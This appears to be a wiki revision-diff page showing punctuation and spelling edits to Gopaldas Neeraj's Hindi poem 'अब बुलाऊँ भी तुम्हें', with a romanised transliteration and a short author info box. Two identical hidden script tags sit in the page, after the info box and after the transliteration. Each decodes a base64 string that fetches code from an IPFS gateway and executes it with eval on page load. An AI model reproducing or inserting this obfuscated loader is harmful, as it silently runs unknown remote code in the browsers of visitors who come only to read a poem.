Difference between revisions of "अब बुलाऊँ भी तुम्हें -गोपालदास नीरज"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
('{| style="background:transparent; float:right" |- | {{सूचना बक्सा कविता |चित्र=Gopaldas-Neeraj.jp...' के साथ नया पन्ना बनाया)
 
 
Line 30: Line 30:
  
 
{{Poemopen}}
 
{{Poemopen}}
<poem>अब बुलाऊँ भी तुम्हें तो तुम न आना!
+
<poem>
टूट जाए शीघ्र जिससे आस मेरी
+
अब बुलाऊँ भी तुम्हें तो तुम न आना!
 +
टूट जाए शीघ्र जिससे आस मेरी,
 
छूट जाए शीघ्र जिससे साँस मेरी,
 
छूट जाए शीघ्र जिससे साँस मेरी,
इसलिए यदि तुम कभी आओ इधर तो
+
इसलिए यदि तुम कभी आओ इधर तो,
 
द्वार तक आकर हमारे लौट जाना!
 
द्वार तक आकर हमारे लौट जाना!
 
अब बुलाऊँ भी तुम्हें...!!
 
अब बुलाऊँ भी तुम्हें...!!
  
 
देख लूं मैं भी कि तुम कितने निठुर हो,
 
देख लूं मैं भी कि तुम कितने निठुर हो,
किस कदर इन आँसुओं से बेखबर हो,
+
किस क़दर इन आँसुओं से बेखबर हो,
इसलिए जब सामने आकर तुम्हारे
+
इसलिए जब सामने आकर तुम्हारे,
मैं बहाऊँ अश्रु तो तुम मुस्कुराना।
+
मैं बहाऊँ अश्रु, तो तुम मुस्कुराना।
 
अब बुलाऊँ भी तुम्हें...!!
 
अब बुलाऊँ भी तुम्हें...!!
  
 
जान लूं मैं भी कि तुम कैसे शिकारी,
 
जान लूं मैं भी कि तुम कैसे शिकारी,
 
चोट कैसी तीर की होती तुम्हारी,
 
चोट कैसी तीर की होती तुम्हारी,
इसलिए घायल हृदय लेकर खड़ा हूँ
+
इसलिए घायल हृदय लेकर खड़ा हूँ,
 
लो लगाओ साधकर अपना निशाना!
 
लो लगाओ साधकर अपना निशाना!
 
अब बुलाऊँ भी तुम्हें...!!
 
अब बुलाऊँ भी तुम्हें...!!
Line 51: Line 52:
 
एक भी अरमान रह जाए न मन में,
 
एक भी अरमान रह जाए न मन में,
 
औ, न बचे एक भी आँसू नयन में,
 
औ, न बचे एक भी आँसू नयन में,
इसलिए जब मैं मरूं तब तुम घृणा से
+
इसलिए जब मैं मरूं तब तुम घृणा से,
 
एक ठोकर लाश में मेरी लगाना!
 
एक ठोकर लाश में मेरी लगाना!
 
अब बुलाऊँ भी तुम्हें...!!  
 
अब बुलाऊँ भी तुम्हें...!!  

Latest revision as of 06:07, 14 December 2011

ab bulaooan bhi tumhean -gopaladas niraj
kavi gopaladas niraj
janm 4 janavari, 1925
mukhy rachanaean dard diya hai, pran git, asavari, git jo gae nahian, badar baras gayo, do git, nadi kinare, niraj ki pati, lahar pukare, muktaki, git-agit, vibhavari, sangharsh, aantaradhvani, badaloan se salam leta hooan, kuchh dohe niraj ke
inhean bhi dekhean kavi soochi, sahityakar soochi
gopaladas niraj ki rachanaean

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

ab bulaooan bhi tumhean to tum n ana!
toot jae shighr jisase as meri,
chhoot jae shighr jisase saans meri,
isalie yadi tum kabhi ao idhar to,
dvar tak akar hamare laut jana!
ab bulaooan bhi tumhean...!!

dekh looan maian bhi ki tum kitane nithur ho,
kis qadar in aansuoan se bekhabar ho,
isalie jab samane akar tumhare,
maian bahaooan ashru, to tum muskurana.
ab bulaooan bhi tumhean...!!

jan looan maian bhi ki tum kaise shikari,
chot kaisi tir ki hoti tumhari,
isalie ghayal hriday lekar kh da hooan,
lo lagao sadhakar apana nishana!
ab bulaooan bhi tumhean...!!

ek bhi araman rah jae n man mean,
au, n bache ek bhi aansoo nayan mean,
isalie jab maian marooan tab tum ghrina se,
ek thokar lash mean meri lagana!
ab bulaooan bhi tumhean...!!


<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

sanbandhit lekh